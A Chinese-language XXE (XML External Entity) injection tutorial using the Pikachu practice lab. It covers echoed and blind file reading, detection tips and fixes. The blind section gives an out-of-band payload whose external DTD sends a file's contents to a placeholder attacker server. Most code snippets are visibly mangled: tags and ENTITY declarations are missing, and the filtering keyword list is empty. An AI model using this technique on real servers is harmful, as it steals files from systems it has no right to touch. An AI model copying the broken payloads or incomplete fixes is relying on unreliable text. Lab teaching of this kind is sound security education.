WEB漏洞——XXE&XML

先上小迪的思维导图
概念
XML：传输和存储数据格式类型
XXE：XML外部实体注入漏洞（XML External Entity Injection）

XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

上图中的DTD是实体，DTD中的内容就是内部实体的一个声明，图中声明了note作为一个父标签，其中to,from…是note的子标签。

而这张图便是DTD外部实体声明，外部有一个.dtd文件通过SYSTEM"**.dtd"来引用

有回显XXE

通过外部实体我们可以去读取相关文件，拿pikachu靶场说明
首先在我的D盘中创建了一个1.txt的文件
我们编辑好XML文档声明：

DOCTYPE ANY[
  
 //!ENTITY xxe 可以理解为xxe就是代表后面SYSTEM引用的文件
 //file:理解为file协议，也可以用其他协议，如http、ftp等实现相关的功能，
 //SYSTEM后面必须跟文件
]>
<x>&xxe;x>
//这里将xxe的内容通过标签显示

复制到靶场中
可以得到1.txt中的内容

无回显XXE

还是用Pikachu靶场，这里我们要修改下源代码，使其不回显
在vul/xxe/xxe_1.php中将 "echo $html"注释掉，可复现无回显的情况

无回显payload

DOCTYPE test[
//读取文件
//访问url里xx.dtd文件，xx.dtd文件内容在下方
//这里url填自己本地的xx.dtd文件
%dtd;
%send;
]>



xx.dtd中内容:
% send SYSTEM
'http://xxx.xxx.xx.xx:xx/?data=%file;'>"
>
%payload;

将上述payload放入靶场中，在xx.dtd文件里设置的url服务器日志中可查看回显结果

将base64解密，即可得到d://xx.txt的文件内容

发现XEE

这里主要说黑盒测试，主要以下几点：
1.根据数据格式类型判断：testHello
2.根据数据包中Content-Type值判断：如有text/xml、application/xml
3.更改Content-Type值看返回（盲猜），再把攻击语句写进数据包测试
4.做个脚本小子，用工具：附链接https://www.cnblogs.com/bmjoker/p/9614990.html

XXE修复

xxe漏洞修复与防御方案-php、Java、python-过滤及禁用
方案一：禁用外部实体 比如设置PHP：libxml_disable_entity_loader(true); ，其他语言百度搜索
方案二：过滤用户提交的XML数据 过滤关键词：